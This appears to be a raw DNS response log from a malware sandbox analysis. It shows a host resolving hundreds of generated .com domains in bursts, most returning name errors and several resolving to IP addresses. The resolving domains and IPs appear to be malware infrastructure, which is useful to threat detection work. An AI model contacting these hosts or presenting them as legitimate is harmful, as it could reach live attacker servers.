Aug 23, 2024 18:48:23.570135117 CEST	1.1.1.1	192.168.2.4	0xc1b4	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.570135117 CEST	1.1.1.1	192.168.2.4	0xc1b4	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.570143938 CEST	1.1.1.1	192.168.2.4	0x9af4	Name error (3)	vojymic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.570148945 CEST	1.1.1.1	192.168.2.4	0x8927	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.575299025 CEST	1.1.1.1	192.168.2.4	0x5b09	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.576596975 CEST	1.1.1.1	192.168.2.4	0xaf4f	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.576606989 CEST	1.1.1.1	192.168.2.4	0x6d8c	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.579988003 CEST	1.1.1.1	192.168.2.4	0x4ff4	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.579998970 CEST	1.1.1.1	192.168.2.4	0x51ec	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.580007076 CEST	1.1.1.1	192.168.2.4	0xc8a9	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.580017090 CEST	1.1.1.1	192.168.2.4	0x1cd2	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.580028057 CEST	1.1.1.1	192.168.2.4	0x91fb	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.580038071 CEST	1.1.1.1	192.168.2.4	0xea3c	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.580053091 CEST	1.1.1.1	192.168.2.4	0x4372	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.580061913 CEST	1.1.1.1	192.168.2.4	0xed99	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.581974983 CEST	1.1.1.1	192.168.2.4	0xc943	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.581990004 CEST	1.1.1.1	192.168.2.4	0x47ae	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.581998110 CEST	1.1.1.1	192.168.2.4	0x9453	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.582007885 CEST	1.1.1.1	192.168.2.4	0x96e9	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.582016945 CEST	1.1.1.1	192.168.2.4	0x629c	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.582031012 CEST	1.1.1.1	192.168.2.4	0x6d11	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.582041979 CEST	1.1.1.1	192.168.2.4	0xed9	Name error (3)	lygynud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585547924 CEST	1.1.1.1	192.168.2.4	0xe4d9	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585558891 CEST	1.1.1.1	192.168.2.4	0x7931	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585566998 CEST	1.1.1.1	192.168.2.4	0x49cd	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585577011 CEST	1.1.1.1	192.168.2.4	0x7e30	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585587025 CEST	1.1.1.1	192.168.2.4	0xd275	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585597038 CEST	1.1.1.1	192.168.2.4	0x6078	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585606098 CEST	1.1.1.1	192.168.2.4	0xcaa0	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585614920 CEST	1.1.1.1	192.168.2.4	0xf397	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585623980 CEST	1.1.1.1	192.168.2.4	0x724f	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585634947 CEST	1.1.1.1	192.168.2.4	0x878e	Name error (3)	qegyfyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585644960 CEST	1.1.1.1	192.168.2.4	0xca47	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.585654974 CEST	1.1.1.1	192.168.2.4	0x252c	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.587439060 CEST	1.1.1.1	192.168.2.4	0x776	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.587449074 CEST	1.1.1.1	192.168.2.4	0x51a4	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.587456942 CEST	1.1.1.1	192.168.2.4	0xa65a	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.594266891 CEST	1.1.1.1	192.168.2.4	0xd241	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.605444908 CEST	1.1.1.1	192.168.2.4	0x8904	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607804060 CEST	1.1.1.1	192.168.2.4	0x1271	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607814074 CEST	1.1.1.1	192.168.2.4	0xedd1	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607821941 CEST	1.1.1.1	192.168.2.4	0x1e82	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607831955 CEST	1.1.1.1	192.168.2.4	0x2c9	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607841015 CEST	1.1.1.1	192.168.2.4	0x7f63	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607851028 CEST	1.1.1.1	192.168.2.4	0x20fb	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607858896 CEST	1.1.1.1	192.168.2.4	0x8cb1	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.607868910 CEST	1.1.1.1	192.168.2.4	0x5432	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.609394073 CEST	1.1.1.1	192.168.2.4	0xc63b	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.609404087 CEST	1.1.1.1	192.168.2.4	0x7a68	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.609411001 CEST	1.1.1.1	192.168.2.4	0xf5e	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.612293005 CEST	1.1.1.1	192.168.2.4	0x259f	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.612303019 CEST	1.1.1.1	192.168.2.4	0xa1e8	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.612310886 CEST	1.1.1.1	192.168.2.4	0xd558	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.614573956 CEST	1.1.1.1	192.168.2.4	0x8626	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.614573956 CEST	1.1.1.1	192.168.2.4	0x8626	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.730348110 CEST	1.1.1.1	192.168.2.4	0x966a	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.734112978 CEST	1.1.1.1	192.168.2.4	0x4f17	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.734123945 CEST	1.1.1.1	192.168.2.4	0x445	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.781593084 CEST	1.1.1.1	192.168.2.4	0x94a8	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:23.915221930 CEST	1.1.1.1	192.168.2.4	0x88f	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:48:23.915221930 CEST	1.1.1.1	192.168.2.4	0x88f	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:48:23.915221930 CEST	1.1.1.1	192.168.2.4	0x88f	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.658529997 CEST	1.1.1.1	192.168.2.4	0x6f38	Name error (3)	qekynuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.660708904 CEST	1.1.1.1	192.168.2.4	0xa11d	Name error (3)	vopypif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.661572933 CEST	1.1.1.1	192.168.2.4	0x15ae	Name error (3)	qebykap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.664479017 CEST	1.1.1.1	192.168.2.4	0xca87	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.665087938 CEST	1.1.1.1	192.168.2.4	0xe6ca	Name error (3)	vojybek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.665147066 CEST	1.1.1.1	192.168.2.4	0x3872	Name error (3)	lyxygud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668163061 CEST	1.1.1.1	192.168.2.4	0x779d	Name error (3)	vocyjic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668174982 CEST	1.1.1.1	192.168.2.4	0x6e3d	Name error (3)	gaqyreh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668184996 CEST	1.1.1.1	192.168.2.4	0xf82e	Name error (3)	vowyrym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668195009 CEST	1.1.1.1	192.168.2.4	0x6fc1	Name error (3)	qetytug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668205023 CEST	1.1.1.1	192.168.2.4	0x4db0	Name error (3)	gahyvew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668216944 CEST	1.1.1.1	192.168.2.4	0x70c0	Name error (3)	pufycol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668226004 CEST	1.1.1.1	192.168.2.4	0xc110	Name error (3)	gacyhis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668237925 CEST	1.1.1.1	192.168.2.4	0x9372	Name error (3)	qedyxip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.668247938 CEST	1.1.1.1	192.168.2.4	0x75a1	Name error (3)	qeqyreq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.671494007 CEST	1.1.1.1	192.168.2.4	0xdd74	Name error (3)	lymywaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.671506882 CEST	1.1.1.1	192.168.2.4	0xbe85	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.671514988 CEST	1.1.1.1	192.168.2.4	0x4dc	Name error (3)	vonyket.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.671519995 CEST	1.1.1.1	192.168.2.4	0x7c9e	Name error (3)	pumylel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.671809912 CEST	1.1.1.1	192.168.2.4	0x8251	Name error (3)	ganyqow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674671888 CEST	1.1.1.1	192.168.2.4	0x272c	Name error (3)	pujydag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674681902 CEST	1.1.1.1	192.168.2.4	0xbfd8	Name error (3)	lysyxux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674690962 CEST	1.1.1.1	192.168.2.4	0x21c9	Name error (3)	vowykaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674700975 CEST	1.1.1.1	192.168.2.4	0x6cb0	Name error (3)	gatyzys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674710035 CEST	1.1.1.1	192.168.2.4	0x6b7c	Name error (3)	lyvymir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674720049 CEST	1.1.1.1	192.168.2.4	0x22d5	Name error (3)	vopyzuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674730062 CEST	1.1.1.1	192.168.2.4	0x7031	Name error (3)	galyfyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674738884 CEST	1.1.1.1	192.168.2.4	0x420b	Name error (3)	qexynyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674748898 CEST	1.1.1.1	192.168.2.4	0xd79	Name error (3)	gahydoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674757957 CEST	1.1.1.1	192.168.2.4	0xec50	Name error (3)	lykyfen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674767971 CEST	1.1.1.1	192.168.2.4	0x9b60	Name error (3)	pupyxup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674778938 CEST	1.1.1.1	192.168.2.4	0x969a	Name error (3)	qegysoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674787998 CEST	1.1.1.1	192.168.2.4	0xd42b	Name error (3)	pufypiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674798012 CEST	1.1.1.1	192.168.2.4	0x7dce	Name error (3)	purylev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674802065 CEST	1.1.1.1	192.168.2.4	0xe48d	Name error (3)	lygysij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674806118 CEST	1.1.1.1	192.168.2.4	0xcacc	Name error (3)	vocymut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.674814939 CEST	1.1.1.1	192.168.2.4	0xba5b	Name error (3)	qebyqil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.679560900 CEST	1.1.1.1	192.168.2.4	0x4ea2	Name error (3)	pupypiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.679907084 CEST	1.1.1.1	192.168.2.4	0x7e68	Name error (3)	qedysov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.685398102 CEST	1.1.1.1	192.168.2.4	0x677f	Name error (3)	lyrytun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.686088085 CEST	1.1.1.1	192.168.2.4	0xe0e4	Name error (3)	ganykaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.688172102 CEST	1.1.1.1	192.168.2.4	0xd28c	Name error (3)	gatypub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.688184023 CEST	1.1.1.1	192.168.2.4	0x884c	Name error (3)	lyvyjox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.688193083 CEST	1.1.1.1	192.168.2.4	0xcc95	Name error (3)	purytyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.688203096 CEST	1.1.1.1	192.168.2.4	0x6b9	Name error (3)	pujybyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.688213110 CEST	1.1.1.1	192.168.2.4	0x1a88	Name error (3)	puzyguv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.688222885 CEST	1.1.1.1	192.168.2.4	0x7102	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.690166950 CEST	1.1.1.1	192.168.2.4	0xdb92	Name error (3)	pumywaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.692697048 CEST	1.1.1.1	192.168.2.4	0xecad	Name error (3)	volygyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.692831993 CEST	1.1.1.1	192.168.2.4	0x363	Name error (3)	qekyfeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.696636915 CEST	1.1.1.1	192.168.2.4	0x4123	Name error (3)	vonyqok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.696650028 CEST	1.1.1.1	192.168.2.4	0x369a	Name error (3)	vojydam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.696660042 CEST	1.1.1.1	192.168.2.4	0x7b8b	Name error (3)	gacynuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.696670055 CEST	1.1.1.1	192.168.2.4	0xcd7a	Name error (3)	gaqykab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.697365999 CEST	1.1.1.1	192.168.2.4	0x5a5e	Name error (3)	puvymul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.705281019 CEST	1.1.1.1	192.168.2.4	0x86d9	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.811980009 CEST	1.1.1.1	192.168.2.4	0xe704	Name error (3)	lykynyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.812308073 CEST	1.1.1.1	192.168.2.4	0x2c40	Name error (3)	lysysod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.814249992 CEST	1.1.1.1	192.168.2.4	0xeb83	Name error (3)	puvyjop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.828066111 CEST	1.1.1.1	192.168.2.4	0xd7eb	Name error (3)	lygyvar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.829080105 CEST	1.1.1.1	192.168.2.4	0xb83	Name error (3)	lyryled.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.835279942 CEST	1.1.1.1	192.168.2.4	0x22af	Name error (3)	qetylyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.966924906 CEST	1.1.1.1	192.168.2.4	0xe023	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:35.998894930 CEST	1.1.1.1	192.168.2.4	0x6c40	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:36.025490046 CEST	1.1.1.1	192.168.2.4	0xbd3b	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.317545891 CEST	1.1.1.1	192.168.2.4	0x7957	Name error (3)	vofypuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.319948912 CEST	1.1.1.1	192.168.2.4	0x890a	Name error (3)	qeqykog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.321139097 CEST	1.1.1.1	192.168.2.4	0x3b6c	Name error (3)	lymyjon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.321151972 CEST	1.1.1.1	192.168.2.4	0x910e	Name error (3)	lysytyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.322737932 CEST	1.1.1.1	192.168.2.4	0x8d00	Name error (3)	pumyjig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.322750092 CEST	1.1.1.1	192.168.2.4	0x8e3b	Name error (3)	qekyvav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.322758913 CEST	1.1.1.1	192.168.2.4	0x894	Name error (3)	puzybep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.325429916 CEST	1.1.1.1	192.168.2.4	0x7aea	Name error (3)	vonyjim.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.325464964 CEST	1.1.1.1	192.168.2.4	0x81cd	Name error (3)	ganyhuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.326814890 CEST	1.1.1.1	192.168.2.4	0x6ac9	Name error (3)	volybec.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.326826096 CEST	1.1.1.1	192.168.2.4	0xcb9b	Name error (3)	pujycov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.326836109 CEST	1.1.1.1	192.168.2.4	0x11de	Name error (3)	lykyvod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.327322960 CEST	1.1.1.1	192.168.2.4	0x92a0	Name error (3)	lyxyfar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.327336073 CEST	1.1.1.1	192.168.2.4	0xd3ce	Name error (3)	lyryjir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.328936100 CEST	1.1.1.1	192.168.2.4	0xfddc	Name error (3)	gatyrez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.328947067 CEST	1.1.1.1	192.168.2.4	0x199e	Name error (3)	vopyret.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.328955889 CEST	1.1.1.1	192.168.2.4	0xe37d	Name error (3)	qekysip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.328967094 CEST	1.1.1.1	192.168.2.4	0x5dc4	Name error (3)	qetyrap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.328975916 CEST	1.1.1.1	192.168.2.4	0xf7e1	Name error (3)	qedyleq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.328985929 CEST	1.1.1.1	192.168.2.4	0xf991	Name error (3)	vocybam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.328994036 CEST	1.1.1.1	192.168.2.4	0x66bd	Name error (3)	qedytul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329003096 CEST	1.1.1.1	192.168.2.4	0xd4da	Name error (3)	puzydal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329013109 CEST	1.1.1.1	192.168.2.4	0x36e4	Name error (3)	vofyzym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329021931 CEST	1.1.1.1	192.168.2.4	0x251b	Name error (3)	vocygyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329037905 CEST	1.1.1.1	192.168.2.4	0x40e	Name error (3)	qebyhuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329047918 CEST	1.1.1.1	192.168.2.4	0xec89	Name error (3)	qetykol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329929113 CEST	1.1.1.1	192.168.2.4	0x6b9a	Name error (3)	vonymuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329946041 CEST	1.1.1.1	192.168.2.4	0xc5ef	Name error (3)	lyvyguj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329955101 CEST	1.1.1.1	192.168.2.4	0x4514	Name error (3)	pumymuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329963923 CEST	1.1.1.1	192.168.2.4	0x8e6f	Name error (3)	gatykow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329972982 CEST	1.1.1.1	192.168.2.4	0x8bc3	Name error (3)	qegytyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329982996 CEST	1.1.1.1	192.168.2.4	0xcd4f	Name error (3)	lygyxun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329991102 CEST	1.1.1.1	192.168.2.4	0x8fb6	Name error (3)	gahypus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.329999924 CEST	1.1.1.1	192.168.2.4	0x8d59	Name error (3)	vopykak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.330009937 CEST	1.1.1.1	192.168.2.4	0x4c9f	Name error (3)	lyrywax.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.330018997 CEST	1.1.1.1	192.168.2.4	0xefb4	Name error (3)	galydoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.330029011 CEST	1.1.1.1	192.168.2.4	0x7f93	Name error (3)	gadyzyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.331967115 CEST	1.1.1.1	192.168.2.4	0x170	Name error (3)	gaqyqis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.331978083 CEST	1.1.1.1	192.168.2.4	0x1db9	Name error (3)	vowyqoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.331989050 CEST	1.1.1.1	192.168.2.4	0x5f29	Name error (3)	qeqyqiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.342757940 CEST	1.1.1.1	192.168.2.4	0x4818	Name error (3)	pupytyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.346751928 CEST	1.1.1.1	192.168.2.4	0xb84c	Name error (3)	galyvas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.347364902 CEST	1.1.1.1	192.168.2.4	0x16dd	Name error (3)	gadypuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.350842953 CEST	1.1.1.1	192.168.2.4	0xc94c	Name error (3)	gacyfew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.351134062 CEST	1.1.1.1	192.168.2.4	0x2ca7	Name error (3)	vojycif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.351144075 CEST	1.1.1.1	192.168.2.4	0x5ec5	Name error (3)	lyvynen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.351582050 CEST	1.1.1.1	192.168.2.4	0x422	Name error (3)	ganynyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.351593018 CEST	1.1.1.1	192.168.2.4	0x3033	Name error (3)	qexyfel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.351603985 CEST	1.1.1.1	192.168.2.4	0xa490	Name error (3)	lykysix.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.352468967 CEST	1.1.1.1	192.168.2.4	0x27a7	Name error (3)	gacyvah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.352485895 CEST	1.1.1.1	192.168.2.4	0x4883	Name error (3)	puryjil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.352495909 CEST	1.1.1.1	192.168.2.4	0xd7a1	Name error (3)	qebynyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:50.352509022 CEST	1.1.1.1	192.168.2.4	0xee03	Name error (3)	puvybeg.com	none	none	A (IP address)	IN (0x0001)	false
